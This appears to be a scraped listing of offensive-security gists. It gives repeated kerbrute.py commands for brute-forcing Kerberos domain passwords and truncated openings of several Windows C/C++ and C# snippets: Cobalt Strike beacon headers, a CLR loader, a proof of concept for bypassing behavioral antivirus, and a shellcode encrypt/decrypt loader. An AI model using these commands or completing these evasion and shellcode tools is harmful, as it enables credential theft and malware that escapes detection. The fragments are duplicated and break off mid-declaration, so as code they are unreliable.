With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#include <windows.h> | |
#include <stdio.h> | |
#include <dsgetdc.h> | |
#include <psapi.h> | |
extern "C" { | |
#include "beacon.h" | |
}; | |
// Compile as C++ (/TP) for decltype |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
/* | |
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes. | |
*/ | |
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |
#include <windows.h> | |
#include <stdint.h> | |
#include <stdbool.h> | |
#include <stdio.h> | |
#include <sal.h> | |
#include <assert.h> | |
#ifdef _X86_ | |
#error "This snippet only build in 64-bit due to heavy use of uintptr arithmetics." | |
#endif |
#include <Windows.h> | |
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo); | |
typedef VOID(__stdcall* Shellcode)(); | |
LPBYTE ShellcodeBuffer; | |
ULONG_PTR PreviousOffset; | |
ULONG_PTR CurrentOffset; | |
ULONGLONG InstructionCount; | |
DWORD dwOld; |
// memBruteforce.cpp by aaaddress1@chroot.org | |
// brute search loaded moudules in memory | |
// rewrite from https://www.exploit-db.com/exploits/45293 | |
#include <Windows.h> | |
#include <iostream> | |
#pragma warning(disable:4996) | |
bool isMemExist(size_t addr) { | |
int retv; | |
__asm { |
#define _CRT_SECURE_NO_WARNINGS | |
#include <iostream> | |
#include <windows.h> | |
#include <psapi.h> | |
typedef struct _PS_ATTRIBUTE { | |
ULONG Attribute; | |
SIZE_T Size; | |
union { |